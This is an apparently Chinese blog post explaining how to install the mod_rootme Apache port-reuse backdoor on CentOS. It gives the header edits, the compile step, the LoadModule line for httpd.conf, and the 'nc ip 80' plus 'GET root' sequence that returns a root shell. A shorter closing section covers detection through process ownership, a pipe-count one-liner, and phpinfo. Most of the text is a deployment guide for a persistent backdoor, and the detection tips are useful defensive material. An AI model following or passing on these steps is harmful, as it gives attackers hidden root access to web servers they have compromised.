Apache端口复用后门

  • A+
所属分类:颓废's Blog
摘要

Apache2.5
利用方式

先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错

测试环境

CentOSx64 6.5

Apache2.5

利用方式

先修改后门的里面的httpd22.h文件,不修改的话,在apache启动的时候会报错

将: #define MODULE_MAGIC_COOKIE 0x41503230UL 改为: #define MODULE_MAGIC_COOKIE 0x41503232UL  将: #define MODULE_MAGIC_NUMBER_MAJOR 20020903 改为: #define MODULE_MAGIC_NUMBER_MAJOR 20051115

然后保存。输入make linux进行编译

Apache端口复用后门

然后修改/etc/httpd/conf/httpd.conf

添加 LoadModule rootme22_module modules/mod_rootme22.so 加载这个模块。

然后启动apache

然后使用就可以连接80端口 nc ip 80 然后输入GET root
Apache端口复用后门

成功获取shell

0x02 检测方式

1.通过ps -ef grep httpd 可以看到有root用户使用的httpd子进程
Apache端口复用后门

然后可以进一步去查看apache配置文件

2.通过

ps -ef | grep http | head -n 1 | awk '{system("ls -l /proc/"$2"/fd")}' | grep pipe | wc -l
正常情况下是64,加载了mod_rootme后是66

3.在web目录下写个phpinfo看是否加载了mod_rootme模块


作者:Tomato

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: